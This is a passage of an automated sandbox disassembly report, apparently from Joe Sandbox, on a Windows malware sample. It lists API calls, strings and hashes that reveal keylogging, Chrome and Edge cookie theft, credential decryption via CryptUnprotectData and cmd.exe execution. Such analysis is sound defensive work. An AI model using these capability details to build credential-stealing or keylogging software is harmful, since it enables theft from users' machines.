                                                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                                                        • API String ID: 368326130-3219657780
                                                                                        • Opcode ID: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                                                                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                                        • Opcode Fuzzy Hash: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                                                                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 004162F5
                                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CloseCreateValue
                                                                                        • String ID: !D@$okmode$PG
                                                                                        • API String ID: 3411444782-3370592832
                                                                                        • Opcode ID: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                                                                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                                        • Opcode Fuzzy Hash: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                                                                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                                                        Strings
                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                        • API String ID: 1174141254-1980882731
                                                                                        • Opcode ID: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                                                                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                                        • Opcode Fuzzy Hash: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                                                                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                                                        Strings
                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                        • API String ID: 1174141254-1980882731
                                                                                        • Opcode ID: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                                                                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                                        • Opcode Fuzzy Hash: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                                                                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                        • String ID: Offline Keylogger Started
                                                                                        • API String ID: 465354869-4114347211
                                                                                        • Opcode ID: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                                                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                                        • Opcode Fuzzy Hash: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                                                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                        • String ID: Online Keylogger Started
                                                                                        • API String ID: 112202259-1258561607
                                                                                        • Opcode ID: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                                                                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                                        • Opcode Fuzzy Hash: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                                                                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocalTime
                                                                                        • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                                                        • API String ID: 481472006-3277280411
                                                                                        • Opcode ID: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                                                                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                                        • Opcode Fuzzy Hash: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                                                                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                                                        Strings
                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                        • API String ID: 2532271599-1507639952
                                                                                        • Opcode ID: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                                                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                                        • Opcode Fuzzy Hash: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                                                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: CryptUnprotectData$crypt32
                                                                                        • API String ID: 2574300362-2380590389
                                                                                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                                                                        • GetLastError.KERNEL32 ref: 0044C296
                                                                                        • __dosmaperr.LIBCMT ref: 0044C29D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 2336955059-263838557
                                                                                        • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                                                                        • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                                                                        • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                                                                        • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                        • String ID: Connection Timeout
                                                                                        • API String ID: 2055531096-499159329
                                                                                        • Opcode ID: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                                                                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                                        • Opcode Fuzzy Hash: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                                                                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw
                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                        • API String ID: 2005118841-1866435925
                                                                                        • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                                                                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                                        • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                                                                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                                                                        • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FormatFreeLocalMessage
                                                                                        • String ID: @J@$PkGNG
                                                                                        • API String ID: 1427518018-1416487119
                                                                                        • Opcode ID: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                                                                        • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                                                                        • Opcode Fuzzy Hash: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                                                                        • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                        • String ID: bad locale name
                                                                                        • API String ID: 3628047217-1405518554
                                                                                        • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                                                                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                                        • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                                                                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                                                                        • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                                                                        • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValue
                                                                                        • String ID: Control Panel\Desktop
                                                                                        • API String ID: 1818849710-27424756
                                                                                        • Opcode ID: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                                                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                                        • Opcode Fuzzy Hash: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                                                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                                        • ShowWindow.USER32(00000009), ref: 00416C61
                                                                                        • SetForegroundWindow.USER32 ref: 00416C6D
                                                                                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                                          • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                        • String ID: !D@
                                                                                        • API String ID: 186401046-604454484
                                                                                        • Opcode ID: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                                                                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                                        • Opcode Fuzzy Hash: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                                                                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShell
                                                                                        • String ID: /C $cmd.exe$open
                                                                                        • API String ID: 587946157-3896048727
                                                                                        • Opcode ID: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                                                                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                                        • Opcode Fuzzy Hash: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                                                                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                                        • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                        • API String ID: 3472027048-1236744412
                                                                                        • Opcode ID: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                                                                        • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                                        • Opcode Fuzzy Hash: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                                                                        • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                                                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                                                          • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
